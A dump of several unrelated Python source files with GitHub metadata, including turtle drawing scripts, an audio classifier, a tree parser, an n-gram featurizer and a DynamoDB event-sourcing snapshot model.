turtle.circle(1)
#head
turtle.penup()
turtle.goto(0, 210)
turtle.pendown()
turtle.circle(60)
#Hat
turtle.penup()
turtle.goto(0, 330)
turtle.pendown()
turtle.forward(70)
turtle.begin_fill()
turtle.goto(40, 330)
turtle.left(90)
turtle.forward(40)
turtle.left(90)
turtle.forward(80)
turtle.left(90)
turtle.forward(40)
turtle.left(90)
turtle.forward(40)
turtle.fillcolor("black")
turtle.end_fill()
turtle.goto(-70, 330)
#Eyes
turtle.penup()
turtle.goto(-20, 280)
turtle.pendown()
turtle.circle(2)
turtle.penup()
turtle.goto(20, 280)
turtle.pendown()
turtle.circle(2)
#mouth
turtle.penup()
turtle.goto(-20, 240)
turtle.pendown()
turtle.left(-90)
turtle.circle(20, 180)
#right arm
turtle.penup()
turtle.goto(100, 100)
turtle.pendown()
turtle.left(200)
turtle.forward(150)
turtle.left(70)
turtle.forward(30)
turtle.left(180)
turtle.forward(30)
turtle.left(20)
turtle.forward(30)
turtle.left(180)
turtle.forward(30)
turtle.left(270)
turtle.forward(30)
#right arm
turtle.penup()
turtle.goto(-100, 100)
turtle.pendown()
turtle.left(200)
turtle.forward(150)
turtle.left(70)
turtle.forward(30)
turtle.left(180)
turtle.forward(30)
turtle.left(20)
turtle.forward(30)
turtle.left(180)
turtle.forward(30)
turtle.left(270)
turtle.forward(30)
| [
"natewagstaff21@gmail.com"
] | natewagstaff21@gmail.com |
d4ff66e3840020400fd3bc1f0961d882357aa743 | c0598fcf7680dd7919b319f597f3730e1dc56ec7 | /Lab2/task13.py | 6e03b93c2cc52171b3e032c5b1580373a326f9f5 | [] | no_license | Andreev1189/Labs-python-2021 | 2fc787bb2454d841b42643b9d1d616d0cd4977d8 | ba4c178dc79acd8e581064a2c9eb6c0b5c9fc0c3 | refs/heads/main | 2023-08-05T15:48:48.060674 | 2021-10-04T07:29:30 | 2021-10-04T07:29:30 | 413,296,552 | 0 | 0 | null | 2021-10-04T06:15:41 | 2021-10-04T06:15:41 | null | UTF-8 | Python | false | false | 1,041 | py | import turtle
import math
from random import *
def arc(r):
turtle.color('Black')
n = 100
for i in range(n):
turtle.forward(r)
turtle.right(180 / n)
def circle(r):
turtle.color('Green')
turtle.width(2)
n = 200
for i in range(n+1):
turtle.forward(r)
turtle.left(360 / n)
turtle.begin_fill()
circle(3)
turtle.color('Yellow')
turtle.end_fill()
turtle.penup()
turtle.color('Blue')
turtle.goto(- 30, 120)
turtle.pendown()
turtle.begin_fill()
circle(0.5)
turtle.color('Blue')
turtle.end_fill()
turtle.penup()
turtle.goto(30, 120)
turtle.pendown()
turtle.begin_fill()
circle(0.5)
turtle.color('Blue')
turtle.end_fill()
turtle.penup()
turtle.goto(0, 100)
turtle.pendown()
turtle.width(10)
turtle.color('Black')
turtle.right(95)
turtle.forward(40)
turtle.color('Red')
turtle.penup()
turtle.goto(45, 70)
turtle.pendown()
n = 100
for i in range(n):
turtle.forward(1.4)
turtle.right(180 / n) | [
"noreply@github.com"
] | noreply@github.com |
256a78690243b47369486b84acba56ba650f403c | 4131625553ff59b4c730ae7148dd5d603d8cb87d | /hackerEarth/challenges/iitKanpurFreshersProgrammingContest2016/pokeluck.py | 30419fb90a7798a46de3e00cf2d4155fda419afc | [
"MIT",
"Apache-2.0"
] | permissive | odonnmi/learnNPractice | 29034304303aab3827e6b3334b1d7d9d65b93e54 | eb1c775e4d6e35cebb7b109b46b91f9aecb2d9ec | refs/heads/master | 2020-12-04T14:52:00.520219 | 2019-09-03T06:30:03 | 2019-09-03T06:30:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,781 | py | # Pokeluck
#######################################################################################################################
#
# Mewtwo is one of the rarest and most famous pokemons in thw pokemon world. If any pokemon gets to fight with
# Mewtwo, he is considered to be "1-lucky". A pokemon that gets to fight with the pokemon who has fought with
# Mewtwo is considered to be "2-lucky", and so on.
#
# The Luckiness is defined on the basis of above mentioned rule. ( 1-Lucky -> Luckiness = 1).
#
# Note1: Consider luckiness of Mewtwo to be 0 .
#
# Note2: No one has negative luckiness.
#
# Note3: If a pokemon A is not Mewtwo himself, and has battled with someone with luckiness X, and has not battled
# with anyone with Luckiness smaller than X, then A has luckiness X+1 .
#
# Note4: It is ensured that every pokemon has finite positive luckiness.
#
# Input:
#
# The first line has two numbers: A,number of pokemons being considered and B, number of pokemon battles
# that have happened.
#
# Then B lines follow, each containing two distinct pokemons, denoting that the two pokemons have battled.
# Pokemons are represented by numbers between 1 and A.
#
# Mewtwo is represented by 1.
#
# Output Format:
#
# Output A-1 lines , ith line containing the luckiness of ith pokemon. (2 <= i <= A)
#
# Constraints:
#
# A <= 1000
#
# B <= (A(A-1))/2 ]
#
#######################################################################################################################
# Input
#
# 3 2
# 1 2
# 2 3
#######################################################################################################################
# Output
#
# 1
# 2
####################################################################################################################### | [
"sagarnikam123@gmail.com"
] | sagarnikam123@gmail.com |
ad6fa5571d9c4ecd03ce8e83db718c9c9dde6bb2 | 2f36dc886195b67fd6fe0de48984e0268b3e0d71 | /html-service/html_service.py | 15c083d5cc4c0c88804445b6a992a4a2fbbe94af | [] | no_license | aek/zato-labs | 84d52b3d1eea515c91fa6e7d4a439af3ee35ca05 | 302e40b8825f8fba5e3ea065280af742904fb25b | refs/heads/master | 2020-12-26T08:17:38.664195 | 2014-02-16T21:30:27 | 2014-02-16T21:30:27 | 16,894,545 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,093 | py | # -*- coding: utf-8 -*-
"""
Copyright (C) 2013 Dariusz Suchojad <dsuch at zato.io>
Licensed under LGPLv3, see LICENSE.txt for terms and conditions.
"""
# stdlib
from cStringIO import StringIO
from logging import DEBUG
# Django
from django.conf import settings
from django.template import Context, Template
# Zato
from zato.server.service import Service
# Configure Django settings when the module is picked up
if not settings.configured:
settings.configure()
class HTMLService(Service):
def generate_payload(self, ctx, template):
# Generate HTML and return response
c = Context(ctx)
t = Template(template)
payload = t.render(c).encode('utf-8')
self.logger.debug('Ctx:[%s]', ctx)
self.logger.debug('Payload:[%s]', payload)
if self.logger.isEnabledFor(DEBUG):
buff = StringIO()
pprint(ctx, buff)
self.logger.debug(buff.getvalue())
buff.close()
self.response.payload = payload
self.response.content_type = 'text/html; charset=utf-8'
| [
"dsuch-github@m.zato.io"
] | dsuch-github@m.zato.io |
788e4f26f9ce4a49e8009089a81dd509608996ca | 1c527a1944264784ba6ed237a723376bdee47f02 | /src/utl/strip_csv.py | 0c3dc9fa82235b03ec8b3ca868c5a6d64b12ed89 | [] | no_license | mikegleen/modes | 3544517467b77ddb21ec50c2a624b98e0a7ea308 | e77c89f28c623ce8fd30d7727a1b914461c6a0fd | refs/heads/master | 2023-09-03T15:10:26.931110 | 2023-08-27T07:31:42 | 2023-08-27T07:31:42 | 139,562,349 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | """
For each cell in a CSV file, strip leading and trailing whitespace.
"""
import codecs
import csv
import sys
def main():
incsv = codecs.open(sys.argv[1], 'r', 'utf-8-sig')
outcsv = codecs.open(sys.argv[2], 'w', 'utf-8-sig')
outwriter = csv.writer(outcsv)
for row in csv.reader(incsv):
for column in range(len(row)):
row[column] = row[column].strip() if row[column] else row[column]
outwriter.writerow(row)
if __name__ == '__main__':
main()
| [
"mike.gleen@gmail.com"
] | mike.gleen@gmail.com |
931228bd1d0c10ee686af5daf5aa5cbe4bdfae19 | 96551f7ae1ab0d9bc24bc442dec196caaf328aff | /blog/views.py | 8beccf1c0bec9795611be28385c5b537abd3635c | [] | no_license | moaiii/CastawayYourWorries | cd26d4f8535aab478e3fb1bbd3050fa95bd755be | 3226622647cdbd0eea55a38540e3b1a7dcdef186 | refs/heads/master | 2021-01-19T22:47:50.201594 | 2017-05-22T11:13:44 | 2017-05-22T11:13:44 | 88,859,645 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,062 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from blog.models import Post, General
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from models import Post, Email
from rest_framework.renderers import JSONRenderer
from rest_framework.parsers import JSONParser
from serializers import PostSerializer
def index(request):
posts = Post.objects.filter(published=True)
general = General.objects.get(pk=1)
return render(request, 'index.html', {'posts':posts, 'general':general})
def post(request, slug):
post = get_object_or_404(Post, slug=slug)
return render(request, 'post.html', {'post':post})
@csrf_exempt
def post_list(request):
if request.method == 'GET':
posts = Post.objects.all()
serializer = PostSerializer(posts, many=True)
return JsonResponse(serializer.data, safe=False)
elif request.method == 'POST':
data = JSONParser().parse(request)
serializer = PostSerializer(data=data)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data, status=201)
return JsonResponse(serializer.errors, status=400)
def post_detail(request, pk):
try:
post = Post.objects.get(pk=pk)
except Post.DoesNotExist:
return HttpResponse(status=404)
if request.method =='GET':
serializer = PostSerializer(post)
return JsonResponse(serializer.data)
elif request.method == 'PUT':
data = JSONParser().parse(request)
serializer = PostSerializer(post, data=data)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data)
return JsonResponse(serializer.errors, status=400)
@csrf_exempt
def email_list(request):
if request.method == 'GET':
emails = Email.objects.all()
serializer = EmailSerializer(emails, many=True)
return JsonResponse(serializer.data, safe=False) | [
"chris.melville@phntms.com"
] | chris.melville@phntms.com |
c490400d7d1cada3e4c8dd3545bcb671952c19dd | e5db9aa8890dd9a584ee2ec6ca79c10f3b33f7c7 | /audio_classification.py | 96b5449459e5ff88d21ed737dd5a32b6ed194d4b | [] | no_license | Baasant/Audio_classification | d77887702c6ab6ac4f081ac68c05217b3441dedb | 993370f8f007937a48b7d463470308897d37d6db | refs/heads/main | 2023-08-03T06:21:33.073441 | 2021-09-18T23:45:53 | 2021-09-18T23:45:53 | 407,990,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,004 | py | #https://github.com/krishnaik06/Audio-Classification/blob/main/Part%202-%20Audio%20Classification%20Data%20Preprocessing%20And%20Model%20Creation.ipynb
#### Extracting MFCC's For every audio file
import pandas as pd
import os
import librosa
from tqdm import tqdm
import numpy as np
from sklearn.preprocessing import LabelEncoder
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense,Dropout,Activation,Flatten
from tensorflow.keras.optimizers import Adam
from sklearn import metrics
audio_dataset_path='UrbanSound8K/audio/'
metadata=pd.read_csv('UrbanSound8K/metadata/UrbanSound8K.csv')
#print(metadata.head())
##extract_feaure##
#make all audios have the same length
max_pad_len = 174
def features_extractor(file):
audio, sample_rate = librosa.load(file_name, res_type='kaiser_fast')
mfccs_features = librosa.feature.mfcc(y=audio, sr=sample_rate, n_mfcc=40)
pad_width= max_pad_len - mfccs_features.shape[1]
mfccs_scaled_features = np.pad(mfccs_features, pad_width=((0, 0), (0, pad_width)), mode='constant')
#mfccs_scaled_features = np.mean(mfccs_features.T, axis=0)
return mfccs_scaled_features
####
### Now we iterate through every audio file and extract features
### using Mel-Frequency Cepstral Coefficients
extracted_features=[]
for index_num,row in tqdm(metadata.iterrows()):
file_name = os.path.join(os.path.abspath(audio_dataset_path),'fold'+str(row["fold"])+'/',str(row["slice_file_name"]))
final_class_labels=row["class"]
data=features_extractor(file_name)
extracted_features.append([data,final_class_labels])
### converting extracted_features to Pandas dataframe
extracted_features_df=pd.DataFrame(extracted_features,columns=['feature','class'])
print(extracted_features_df.head())
####
### Split the dataset into independent and dependent dataset
X=np.array(extracted_features_df['feature'].tolist())
print(X.shape)
y=np.array(extracted_features_df['class'].tolist())
print(y.shape)
from tensorflow.keras.utils import to_categorical
from sklearn.preprocessing import LabelEncoder
labelencoder=LabelEncoder()
y=to_categorical(labelencoder.fit_transform(y))
print(y)
from sklearn.model_selection import train_test_split
X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2,random_state=0)
print(X_train.shape)
print(y_train.shape)
###train model ######
import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Convolution2D, Conv2D, MaxPooling2D, GlobalAveragePooling2D
#from keras.optimizers import Adam
#from keras.optimizers import adam
from keras.utils import np_utils
from sklearn import metrics
num_rows = 40
num_columns = 174
num_channels = 1
X_train = X_train.reshape(X_train.shape[0], num_rows, num_columns, num_channels)
X_test = X_test.reshape(X_test.shape[0], num_rows, num_columns, num_channels)
num_labels = y.shape[1]
filter_size = 2
# Construct model
model = Sequential()
model.add(Conv2D(filters=16, kernel_size=2, input_shape=(num_rows, num_columns, num_channels), activation='relu'))
model.add(MaxPooling2D(pool_size=2))
model.add(Dropout(0.2))
model.add(Conv2D(filters=32, kernel_size=2, activation='relu'))
model.add(MaxPooling2D(pool_size=2))
model.add(Dropout(0.2))
model.add(Conv2D(filters=64, kernel_size=2, activation='relu'))
model.add(MaxPooling2D(pool_size=2))
model.add(Dropout(0.2))
model.add(Conv2D(filters=128, kernel_size=2, activation='relu'))
model.add(MaxPooling2D(pool_size=2))
model.add(Dropout(0.2))
model.add(GlobalAveragePooling2D())
model.add(Dense(num_labels, activation='softmax'))
# Compile the model
model.compile(loss='categorical_crossentropy', metrics=['accuracy'], optimizer='adam')
num_epochs = 72
num_batch_size = 256
model.fit(X_train, y_train, batch_size=num_batch_size, epochs=num_epochs, validation_data=(X_test, y_test),verbose=1)
###accuracy ###
# Evaluating the model on the training and testing set
score = model.evaluate(X_train, y_train, verbose=0)
print("Training Accuracy: ", score[1])
score = model.evaluate(X_test, y_test, verbose=0)
print("Testing Accuracy: ", score[1])
###prediction
def print_prediction(file_name):
prediction_feature = features_extractor(file_name)
prediction_feature = prediction_feature.reshape(1, num_rows, num_columns, num_channels)
predicted_vector = model.predict_classes(prediction_feature)
predicted_class = labelencoder.inverse_transform(predicted_vector)
print("The predicted class is:", predicted_class[0], '\n')
predicted_proba_vector = model.predict_proba(prediction_feature)
predicted_proba = predicted_proba_vector[0]
for i in range(len(predicted_proba)):
category = labelencoder.inverse_transform(np.array([i]))
print(category[0], "\t\t : ", format(predicted_proba[i], '.32f') )
#predict class
#filename = '../UrbanSound Dataset sample/audio/100852-0-0-0.wav'
#filename ='UrbanSound8K\audio\fold1\7061-6-0-0.wav'
#print_prediction(filename)
'''''
###train the model
num_labels=y.shape[1]
model=Sequential()
###first layer
model.add(Dense(100,input_shape=(40,)))
model.add(Activation('relu'))
model.add(Dropout(0.5))
###second layer
model.add(Dense(200))
model.add(Activation('relu'))
model.add(Dropout(0.5))
###third layer
model.add(Dense(100))
model.add(Activation('relu'))
model.add(Dropout(0.5))
###final layer
model.add(Dense(num_labels))
model.add(Activation('softmax'))
####
num_epochs = 100
num_batch_size = 32
##compile
model.compile(loss='categorical_crossentropy',metrics=['accuracy'],optimizer='adam')
###
model.fit(X_train, y_train, batch_size=num_batch_size, epochs=num_epochs, validation_data=(X_test, y_test), verbose=1)
test_accuracy=model.evaluate(X_test,y_test,verbose=0)
print(test_accuracy[1])
''' | [
"noreply@github.com"
] | noreply@github.com |
bfcb68987f87927b98914b07904fc10f0cd5aeea | 1927bf03784f5b55d1dbfbc375bda95501e3cc4e | /VENV/bin/pip3 | 2a33998175d9adbfb47f3206649cd7265bf6039f | [] | no_license | szmuschi/Python | 5618bf349664f1beed1e53c816cdc3f312d0c790 | f57e7d474d7b6ac9b1520378e084e6e17b7370f1 | refs/heads/main | 2023-01-07T17:45:22.405567 | 2020-10-27T08:02:37 | 2020-10-27T08:02:37 | 301,638,935 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 402 | #!/home/s/PycharmProjects/Python/Lab1/VENV/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
)
| [
"szmuschi@gmail.com"
] | szmuschi@gmail.com | |
eb7ae1ac126c5b743c4c5ef5c4ccf26c00e3fe0b | 6468584be4f1400ca18dabe59a5c0f05e1f45b03 | /dsl/features/create_ngram_matrix.py | 6e9dd4263e7604fd6bf0246dd03e788605d20f6d | [
"MIT"
] | permissive | juditacs/dsl | 824e04e77d7bf44aab7e0b820b3f36fea9f09e87 | d6212cb2ff0755ceed8f37ee2f80ab47c9dc780c | refs/heads/master | 2021-01-14T13:21:52.215072 | 2020-04-16T09:32:02 | 2020-04-16T09:32:02 | 35,669,552 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,825 | py | from sys import argv, stderr
import cPickle
from featurize import Tokenizer, Featurizer
from dsl.representation.model import Representation
def main():
N = int(argv[1]) if len(argv) > 1 else 3
t = Tokenizer(filter_punct=True, ws_norm=True, strip=True, replace_digits=True)
f = Featurizer(t, N=N)
f.featurize_in_directory(argv[2])
stderr.write('Featurized\n')
#m = f.to_dok_matrix(docs)
f.get_correlations()
stderr.write('Means computed\n')
f.label_feat_pearson()
stderr.write('Correlations computed\n')
cut = int(argv[4]) if len(argv) > 4 else 40
f.filter_top_ngrams(cut)
stderr.write('Top ngrams filtered\n')
f.save_features('train_features')
mtx = f.to_dok_matrix()
with open('train_mtx.cPickle', 'wb') as fh:
cPickle.dump((f.labels.l, mtx), fh, -1)
stderr.write('Data read\n')
stderr.write('Trained\n')
test_f = Featurizer(t, N=N)
test_f.featdict = f.featdict
test_f.featdict.freeze_dict()
test_f.featurize_in_directory(argv[3])
docs = test_f.filter_ngrams(test_f.docs, f.topngrams)
test_f.docs = docs
test_f.topngrams = f.topngrams
test_f.save_features('test_features')
test_f.featdict.save('topfeatures')
test_mtx = test_f.to_dok_matrix()
with open('test_mtx.cPickle', 'wb') as fh:
cPickle.dump((test_f.labels.l, test_mtx), fh, -1)
acc = 0
stderr.write('Test matrix done\n')
r = Representation('dummy', 'svm', svm_ktype='svc')
r.encode(mtx)
stderr.write('Encoded\n')
r.train_classifier(f.labels.l)
for i in xrange(test_mtx.shape[0]):
gold = test_f.labels.l[i]
cl = r.classify_vector(test_mtx.getrow(i).todense())[0]
if gold == cl:
acc += 1
print float(acc) / test_mtx.shape[0]
if __name__ == '__main__':
main()
| [
"judit@sch.bme.hu"
] | judit@sch.bme.hu |
c5f52f673df8b19e29beeee459fa1815dba1f7e4 | 8f139f0f1fd22ab42c2db7d3eb3641e97b73cdb5 | /Geometric Distribution I.py | fe69f89f33e5d9d930d795eb1318cf8b964330a3 | [
"BSD-3-Clause"
] | permissive | Victory-Organization/HackerRank-10-Days-of-Statistics | 28db22842bc778675fd74d00830a5a27c1090522 | 02e4ba930a4adb77b0fa05556ff7a950c85f3eb4 | refs/heads/main | 2023-06-18T06:44:42.394028 | 2021-07-12T18:44:17 | 2021-07-12T18:44:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | def geometric_distributon(n, p):
return ((1-p)**(n-1))*p
a, b = list(map(int, input().split()))
n = int(input())
print('{:.3f}'.format(geometric_distributon(n, a/b))) | [
"58915216+aash-gates@users.noreply.github.com"
] | 58915216+aash-gates@users.noreply.github.com |
03ada0e848cb1c19af6d2c1c844f066696db1280 | 92fac6958ab020d06663598c276d6a1371028c56 | /simpleweather/__init__.py | f75e559cd13f51a04e82b4695ad3c3f2b8d9db03 | [
"MIT"
] | permissive | CreatorSky/simpleweather | 354f28355c5f604d4664946b9e4ce52645e4708a | a79275c4e9a965013fc48b25c3fb9c36fc581f3f | refs/heads/master | 2020-07-04T12:29:36.394683 | 2020-06-11T19:49:05 | 2020-06-11T19:49:05 | 202,287,000 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,844 | py | import requests as re
from bs4 import BeautifulSoup
class Weather(object):
def __init__(self, unit='F', cords=None):
"""
:param unit: F for Fahrenheit, C for Celsius
:param cords: Weather of the passed Geocordinates is fetched,
If none,automatic Coordinates are fetched by ip.
"""
if not cords:
data = re.get('https://ipinfo.io/')
cords = data.json()['loc']
w_url = 'https://weather.com/weather/today/l/' + cords
weather_data = re.get(w_url).text
soup = BeautifulSoup(weather_data, features="html.parser")
# City
self.city = soup.find('h1', {'class': 'today_nowcard-location'}).text
# Current Temp
temp = soup.find('div', {'class': 'today_nowcard-temp'}).find('span').text
# Phrase
self.phrase = soup.find('div', {'class': 'today_nowcard-phrase'}).text
# Feels Like
feels = soup.find('span', {'class': 'deg-feels'}).text
# High Low & UV Index
hilo = list(soup.find('div', {'class': 'today_nowcard-hilo'}).children)
self.uv_index = ' '.join(hilo[5].text.split(' ')[2::])
# Precipitation
precip = soup.find('span', {'class': 'precip-val'}).text
self.precip = precip
# Wind Humidity DewPoint Pressure Visibility
tbody = soup.find('div', {'class': 'today_nowcard-sidecar'}).find('table').find('tbody').find_all('td')
self.humidity = tbody[1].text
if unit.lower() == 'f':
self.current_temp = temp + ' F'
self.feels_like = feels + ' F'
self.hi = hilo[1].text + ' F' if hilo[1].text != '--' else hilo[1].text
self.low = hilo[4].text + ' F'
self.wind = tbody[0].text
self.pressure = tbody[3].text
self.dew_point = tbody[2].text + ' F'
self.visibility = tbody[4].text
else:
self.current_temp = self.__f_to_c(temp)
self.feels_like = self.__f_to_c(feels)
self.hi = self.__f_to_c(hilo[1].text)
self.low = self.__f_to_c(hilo[4].text)
wind_data = tbody[0].text.split(' ')
wind_data[1] = str(round(float(wind_data[1]) * 1.609, 2))
wind_data[2] = 'km/h'
self.wind = ' '.join(wind_data)
self.pressure = str(round(float(tbody[3].text.split(' ')[0]) * 33.864, 2)) + ' mb'
self.dew_point = self.__f_to_c(tbody[2].text)
self.visibility = str(round(float(tbody[4].text.split(' ')[0]) * 1.609, 2)) + ' km'
def __f_to_c(self, temp):
if str(temp[:-1]).isdigit():
return str(round((float(temp[:-1]) - 32) * 5 / 9,2)) + '° C'
else:
return temp
| [
"noreply@github.com"
] | noreply@github.com |
18ad432e70696eec292c28c163e83e546229485d | 45b599cb9828e083e958f0b132fc3e893d81ba87 | /TreeParse.py | a0773d154c0a617cc9d5133c6eda2666ed34dfad | [
"BSD-3-Clause"
] | permissive | deaconjs/AlignmentEditor | 51beecd3fdfbe96d1b020fd7eb05f63ea7496b02 | 5d0c2a97aeba40b75e053306827e3d4e860d3f84 | refs/heads/master | 2021-07-13T19:29:29.096249 | 2017-10-17T02:55:32 | 2017-10-17T02:55:32 | 104,837,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,493 | py | class Data:
#Class Data is designed to hold an object in a tree
# name: the name of the node, generally more for the leaves and root
# length: the length of the branch from its top node
def __init__( self, name, length, id = 0 ):
self.name = name
self.length = length
self.id = id
def __str__( self ):
return "["+self.name+", "+ str( self.length ) + "]"
def Name( self ):
return self.name
def Length( self ):
return self.length
def Match( self, to_match ):
return to_match == self.name
class Node:
#Class Node has
# data: holding the node's current data
# sub: a list of the node's subordinate nodes
def __init__( self ):
self.data = Data("","0")
self.sub = []
self.parent = 0
def leaf( self, data ):
self.data = data
self.sub = []
def internal( self, data, sub ):
self.sub = sub
for item in self.sub:
item.parent = self
self.data = data
def children( self ):
return len( self.sub )
def __str__( self ):
total = ""
total = self.data.__str__()
if len( self.sub ) > 0:
total = total + "->("
for item in self.sub:
total = total + item.__str__() + ","
total = total[:len(total)-1] + ")"
return total
#Search current node and subordinate nodes for the node with data.name equal to name
def Search_For_Name( self, name ):
for item in self.sub:
if item.data.name == name:
return item
else:
to_return = item.Search_For_Name( name )
if( to_return != 0 ):
return to_return
return 0
#Find the longest branch distance below this node
def Longest_Branch( self ):
current_x = self.data.Length()
middle_x = 0
for each_item in self.sub:
newest_x = each_item.Longest_Branch()
if middle_x < newest_x:
middle_x = newest_x
returning = current_x + middle_x
return returning
#Return a list of the gi's found subordinate to this node
def GI_List( self ):
gi_list = []
if(len(self.sub)>0):
for item in self.sub:
if item.data.name != '':
gi_list.append(item.data.name)
else:
gi_list = gi_list + item.GI_List()
else:
gi_list.append( self.data.name )
return gi_list
#Wrapper class to hold a node
class Tree:
def __init__(self, node):
self.node = node
#Find the longest branch in the tree. If root_node is not 0, it is the star point
def Longest_Branch(self, root_node=0):
if( root_node == 0 ):
root_node = self.node
current_x = root_node.data.Length()
middle_x = 0
for each_item in root_node.sub:
newest_x = self.Longest_Branch(each_item)
if middle_x < newest_x:
middle_x = newest_x
returning = current_x + middle_x
return returning
#Search for a node given a name
def Get_Node_By_Name( self, name ):
if self.node.data.name == name:
return root
else:
return self.node.Search_For_Name( name )
| [
"deacon.sweeney@gmail.com"
] | deacon.sweeney@gmail.com |
8c1d21e127a8369519e07fe11256db5a3fde9c41 | adb8ae501aa6a6ff9ba6ab5f5affde701d0c12e2 | /snapshot/model.py | 9131e06ef6b5c0bf65ae44859e474e99ea0b1da7 | [
"Apache-2.0"
] | permissive | rafty/ServerlessEventSoutcing | 83d1a4031ac954e6f1b1d17d57f51f93f278ec10 | 4759a187373af6f0bfded4ff388ba74c09fc4368 | refs/heads/master | 2020-11-24T06:15:23.874266 | 2019-12-14T15:43:12 | 2019-12-14T15:43:12 | 228,003,694 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,148 | py | # -*- coding: utf-8 -*-
import datetime
import logging
from functools import reduce
from pynamodb.models import Model
from pynamodb.attributes import (
UnicodeAttribute,
NumberAttribute,
JSONAttribute
)
from exception_handler import (
raise_for_save_exception,
raise_for_query_exception,
raise_with_no_snapshot_exception)
from error import ItemDoesNotExist, IntegrityError
from retrying import retry
from retry_handler import is_integrity_error
logger = logging.getLogger()
logger.setLevel(logging.INFO)
# --------------------------
# snapshot Table
# --------------------------
class SnapshotModel(Model):
class Meta:
table_name = 'EventStore'
region = 'ap-northeast-1'
max_retry_attempts = 8
base_backoff_ms = 297
item_id = UnicodeAttribute(hash_key=True)
version = NumberAttribute(range_key=True)
from_version = NumberAttribute()
name = UnicodeAttribute()
state = JSONAttribute()
saved_at = UnicodeAttribute()
order_id = UnicodeAttribute(null=True)
class State:
__initial_state = {
'available': 0,
'reserved': 0,
'bought': 0
}
def __init__(self):
pass
def apply(self, current_state, next_event):
event_type = self.__get_event_type(next_event)
handler = getattr(self, '_on_{}'.format(event_type))
if handler:
return handler(current_state, next_event)
return self.__initial_state
@staticmethod
def _on_add(state, event):
state['available'] += event['quantity']
return state
@staticmethod
def _on_reserve(state, event):
state['available'] -= event['quantity']
state['reserved'] += event['quantity']
return state
@staticmethod
def _on_complete(state, event):
state['reserved'] -= event['quantity']
state['bought'] += event['quantity']
return state
@staticmethod
def _on_cancel(state, event):
state['available'] += event['quantity']
state['reserved'] -= event['quantity']
return state
@staticmethod
def __get_event_type(event):
splited = event['event_type'].lower().split('_')
return splited[-1]
class Snapshot:
__snapshot_suffix = '-snapshot'
__initial_snapshot_form = {
'item_id': '-snapshot',
'version': 0,
'name': '',
'from_version': 0,
'state': {
'available': 0,
'reserved': 0,
'bought': 0
},
'saved_at': ''
}
def __init__(self, event):
self.__event = event
self.__model = SnapshotModel
self.__state = State()
self.__current_snapshot = {}
@retry(wait_exponential_multiplier=100,
wait_exponential_max=1000,
retry_on_exception=is_integrity_error)
def update(self):
self.__get_current_snapshot()
next_snapshot = self.__get_next_snapshot()
self.__persist(next_snapshot)
return
def __get_current_snapshot(self):
try:
snapshot_item_id = self.item_id
with raise_for_query_exception(snapshot_item_id):
snapshot = self.__model.query(
snapshot_item_id,
self.__model.version > 0,
limit=1,
scan_index_forward=False).next()
self.current_snapshot = snapshot.attribute_values
except ItemDoesNotExist:
self.current_snapshot = self.initial_snapshot
def __persist(self, next_snapshot):
snapshot = self.__model(**next_snapshot)
logger.info('__persist: {}'.format(snapshot.attribute_values))
with raise_with_no_snapshot_exception(snapshot.item_id):
snapshot.save(
condition=(self.__model.item_id != snapshot.item_id) &
(self.__model.version != snapshot.version)
)
def __get_next_snapshot(self):
logger.info('__get_next_snapshot: {}'.format(self.current_snapshot))
next_snapshot = self.current_snapshot
next_snapshot['version'] += 1
next_snapshot['from_version'] = self.__event['version']
next_snapshot['saved_at'] = str(datetime.datetime.utcnow())
next_snapshot['state'] = reduce(self.__calculate_state,
[self.__event],
self.current_snapshot['state'])
return next_snapshot
def __calculate_state(self, current_state, next_event):
return self.__state.apply(current_state, next_event)
@property
def initial_snapshot(self):
initial_snapshot = self.__initial_snapshot_form
initial_snapshot['item_id'] = self.item_id
initial_snapshot['name'] = self.__event['name']
return initial_snapshot
@property
def item_id(self):
return self.__event['item_id'] + self.__snapshot_suffix
# --------------------------
# snapshot Table
# --------------------------
class DeduplicateEventModel(Model):
class Meta:
table_name = 'EventStore'
region = 'ap-northeast-1'
max_retry_attempts = 8
base_backoff_ms = 297
item_id = UnicodeAttribute(hash_key=True)
version = NumberAttribute(range_key=True)
class DeduplicateEvent:
__item_suffix = '-deduplication'
def __init__(self, event):
self.model = DeduplicateEventModel
self.event = event
def is_duplicate_event(self):
try:
deduplicate = self.model(
self.event['event_id'] + self.__item_suffix,
0)
with raise_for_save_exception(self.event['event_id']):
deduplicate.save(
condition=(self.model.item_id != self.event_id) &
(self.model.version != 0)
)
return False
except IntegrityError:
logger.info('is_duplicate_event: {}'.format(self.event))
return True
@property
def event_id(self):
return self.event['event_id'] + self.__item_suffix
| [
"yagita.takashi@gmail.com"
] | yagita.takashi@gmail.com |
